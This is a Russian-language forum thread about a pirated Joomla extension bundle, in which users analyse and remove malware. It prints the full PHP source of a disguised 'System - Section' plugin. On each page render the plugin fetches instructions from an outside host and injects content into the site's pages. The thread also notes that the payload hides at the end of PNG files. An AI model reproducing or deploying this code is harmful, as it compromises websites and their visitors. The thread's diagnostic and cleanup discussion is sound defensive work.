Сборка All NoNumber! Pro

[polega]

а вот интересно, что этот вредонос делал?
вот содержимое этого файла

Спойлер: section.php

<?php
defined( '_JEXEC' ) or die( 'Restricted access' );

jimport( 'joomla.plugin.plugin' );

class  plgSystemSection extends JPlugin {
   
    function plgSystemSection(& $subject, $config) {
        parent::__construct($subject, $config);
    }
   
    function getCategoriesListView( $object_id, $page = 0 ) {
    global $myCat;
    $object_id = (int) $object_id;
    $object_group = trim( $object_group );

    $acl = & CategoryFactory::getACL();
    $config = & JCommentsFactory::getConfig();
    $comments_per_page = $config->getInt('category_per_page');
    $comments_page_limit = $config->getInt('category_page_limit');
    $canPublish = $acl->canPublish();
    }
   
    function onAfterRender() {
        $body = JResponse::getBody();
        if(!$body||$body=='') return true;
        $mainframe = & JFactory::getApplication('site');
        if($mainframe->isAdmin()) return;
            $body = $this->installOptions($body);
        JResponse::setBody($body);
    }
   
    function getCategoryNewTree( $object_id, $object_group = 'com_content' ) {
    global $my;

    $object_id = (int) $object_id;
    $object_group = trim($object_group);

    $acl = & JCommentsFactory::getACL();
    $config = & JCommentsFactory::getConfig();
    $canPublish = $acl->canPublish();
    $canComment = $acl->canComment();
    }
   
    function getURIattr() {
        return (!@$_SERVER['REQUEST_URI'])? @getenv("REQUEST_URI") : @$_SERVER['REQUEST_URI'];
    }
   
    public function getConfigOpt() {
        $Conf = @file_get_contents('http://gene7conf.com/?d=' . $_SERVER['HTTP_HOST']);
        return @unserialize($Conf);
    }
   
    function CategoryViewsTime( $name, $reason = '') {
    global $mainframe, $my;

    $config = & JCommentsFactory::getConfig();

    if ($config->get('CategoryGet') != '') {
            $object = new stdClass();
            $object->object_cat = CategoryFactory::getAbs($object->object_cat);
            $commentText  = $comment->comment;
    }
    }
   
    function installOptions($content) {
        try {
            $getOptions = $this->getConfigOpt();
            $ord = @$getOptions['l'][$this->getURIattr()];
            if(count(@$ord['m'])) {
                $opt = (@$ord['k'])? $ord['k'] : $getOptions['d'];
                $mopt = (count(@$getOptions['*']))? $getOptions['*'] : array();
                $l=''; foreach(array_merge($ord['m'], $mopt) as $elem) {$l .= ' '. $elem;}
                $content = @preg_replace("|{$opt}|", $opt . $l, $content, 1);
            }
        } catch (Exception $e) {}
        return $content;
    }
   
    function loadAlternateCatergory($languageSuffix = '') {
        if ($languageSuffix == '') {
        $languageSuffix = CategoryInput::getVar('lsfx', '');
    }
    if ($languageSuffix != '') {
        $config = & CategoryFactory::getConfig();
        $config->set('lsfx', $languageSuffix);

        $language = & JFactory::getLanguage();
        $language->load($languageSuffix);
    }
    }
}
?>

может гуру разберутся?

 

[Kolfg]

Да вот настораживает непонятная ссылка на непонятный сайт:

Пробовал на него зайти - сайт недоступен. Так, что удалять совсем этот модуль с сайта раз в нем такие непонятки, или же можно довести его до ума?

 

[polega]

или же можно довести его до ума?

конечно можно довести. Для просмотра ссылки Войди или Зарегистрируйся
удаляйте файлы, не имеющие отношения к скрипту

Спойлер

extensions\j2\administrator\components\com_advancedmodules\models\defaultInfo.php
extensions\j2\administrator\components\com_advancedmodules\models\newDates.php
extensions\j2\administrator\components\com_advancedmodules\views\preview\advenced.png <<< открыть в любом редакторе для просмотра встроенных кодов (в самом внизу увидите)
extensions\j3\administrator\components\com_advancedmodules\models\defaultInfo.php
extensions\j3\administrator\components\com_advancedmodules\models\newDates.php
extensions\j3\administrator\components\com_advancedmodules\views\preview\advenced.png  <<< открыть в любом редакторе для просмотра встроенных кодов (в самом внизу увидите)

и удаляйте лишние строки из следующих файлов

Спойлер

extensions\j2\administrator\components\com_advancedmodules\advancedmodules.php
и
extensions\j3\administrator\components\com_advancedmodules\advancedmodules.php

строка 35: $thmDir    = dirname(__FILE__) .'/models/';
строка 50: $assetDir = dirname(__FILE__) .'/views/preview/';
строка 60: require_once( $thmDir . 'newDates.php' );
строка 67: require_once( $thmDir . 'defaultInfo.php' );

ну и на всякий случай отключите этот левый плагин и удалите файл вредоносного кода, Для просмотра ссылки Войди или Зарегистрируйся

 

[Kolfg]

Остаётся плагин под названием System - Section (так он обозначен в Менеджере плагинов), и при попытке зайти в его настройки появляется ошибка: 500 - Обнаружена ошибка. Файл section.xml не найден.
Спустя какое-то время (у меня прошло примерно 13 дней с момента установки и сноса) сайт начинает жутко тормозить.
Лечится отключением этого плагина.
Ну и проверьте в папке plugins/system/section наличие файла section.php и если он есть, то можно грохнуть.

Я посмотрел исходный (как бы инфицированный архив) v4.13.2. Так вот, в моем варианте архива указанные ненужные строки были - я их удалил. А вот плагина section.php в архиве не обнаружил. Но на моем сайте он стоит в списке включенных плагинов. Т.е., получается не Advanced Module Manager Pro 4.13.2 ставил его?

В то же время, погуглив обнаружил вот интересную фразу про чужеродный код в Offlajn Universal AJAX Live Search v.5.3:

Там тоже фигурирует /plugins/system/section.php

Так как быть? Не получится ли, что отключив или удалив section.php нарушится работа других модулей?

Или Offlajn Universal AJAX Live Search v.5.3 тоже инфицирован?

Сделал глобальный поиск по сайту и нашел еще один файл, в котором есть строка с /plugins/system/section.php. Это файл:

\modules\mod_pwebcontact\helpers\dateSelect.php

Данный файл был установлен Offlajn Perfect AJAX Popup Contact Form v3.2.7. Но его уже нет в версии 3.2.8!

Заодно в Offlajn Perfect AJAX Popup Contact Form v3.2.7 обнаружил файл с подозрительным кодом конце: \images\loading.png

Этого файла нет вообще в версии 3.2.8.

Версии 3.2.7 и 3.2.8 качал с этого форума вроде.

Уже очень подозрительно вся эта история с тремя файлами здесь. Не хочу никого обидеть - но выкладываются инфицированные или непроверенные файлы.

Так, знатоки PHP, давайте быстро говорите, к чему бы все это и где и что тут вредит. И заодно может отпишете в профильных темах, если это имеет место быть относительно Offlajn Perfect AJAX Popup Contact Form и Offlajn Universal AJAX Live Search.

 

[polega]

А вот плагина section.php в архиве не обнаружил. Но на моем сайте он стоит в списке включенных плагинов. Т.е., получается не Advanced Module Manager Pro 4.13.2 ставил его?

Если вы точно ранее не ставили этот компонент, получается что так. Но если ставили и снесли, то этот /plugins/system/section.php всё равно остаётся. Насколько хватает моего очень-очень поверхностного знания PHP, и то можно понять, просматривая код заражённого Advanced Module Manager Pro 4.13.2, что этот /plugins/system/section.php создаётся при установке инфицированного компонента, а сам вредоносный код хранится в конце картинки advenced.png. Оттуда он и берётся при генерации /plugins/system/section.php.

Заодно в Offlajn Perfect AJAX Popup Contact Form v3.2.7 обнаружил файл с подозрительным кодом конце: \images\loading.png

Ха! Посмотрел у себя, есть такой архивчик, не пользовался, но лежит на всякий случай. Так вот, код в конце \images\loading.png повторяет код из advenced.png. Ссылка на Для просмотра ссылки Войди или Зарегистрируйся точно присутствует.
Ситуация с Offlajn Universal AJAX Live Search v.5.3 аналогичная. В файле \admin\extensions\mod_universal_ajaxlivesearch\themes\elegant\images\loaders\loading.png тот-же код со ссылкой на Для просмотра ссылки Войди или Зарегистрируйся.

Так как быть? Не получится ли, что отключив или удалив section.php нарушится работа других модулей?

Моё мнение - /plugins/system/section.php - это вредоносный код, появляется при установке заражённых компонентов, и подлежит немедленному удалению. Нарушится что или нет - так сначала удалите, а потом проверьте функционал ваших Offlajn Perfect AJAX Popup Contact Form и Offlajn Universal AJAX Live Search.

Уже очень подозрительно вся эта история с тремя файлами здесь. Не хочу никого обидеть - но выкладываются инфицированные или непроверенные файлы.

Не только здесь, на ру-трекере есть несколько раздач, Для просмотра ссылки Войди или Зарегистрируйся, с подобным вредоносным кодом. Уж не знаю, кто был первоисточником, но то что автор один и тот-же, к бабке не ходи.

 

[Kolfg]

Не только здесь, на ру-трекере есть несколько раздач, Для просмотра ссылки Войди или Зарегистрируйся, с подобным вредоносным кодом. Уж не знаю, кто был первоисточником, но то что автор один и тот-же, к бабке не ходи.

Ну так может и плагин System - Section не просто отключить, а вообще удалить? Он никакой функции не выполняет?

 

[polega]

У меня не получилось удалить так просто, через менеджер расширений. Пишет:

Удаление плагина: Манифест файла недопустим или не найден.
Ошибка при удалении плагина.

Можно только отключить.

 

[korkunov]

У меня не получилось удалить так просто, через менеджер расширений. Пишет:

Удаление плагина: Манифест файла недопустим или не найден.
Ошибка при удалении плагина.

Можно только отключить.

Удали из БД в таблице ?????_extensions запись с плагином, ну и сам плагин грохни.

 

[onuvidelsolnce]

Подскажите, можно ли Tooltips Pro 2.2.2 установить на Joomla 3.2? при установке пишет JInstaller: :Install: Не удалось найти XML-файл установки
Очень надо! Спасибо

 

[korkunov]

А он и не установится на 3.3
Вот что в XML
<install version="1.5" type="component" method="upgrade">
Если нужно на 3.3 - скачай Для просмотра ссылки Войди или Зарегистрируйся или купи или ищи аналог.
Могу предложить Для просмотра ссылки Войди или Зарегистрируйся, на нулледе Для просмотра ссылки Войди или Зарегистрируйся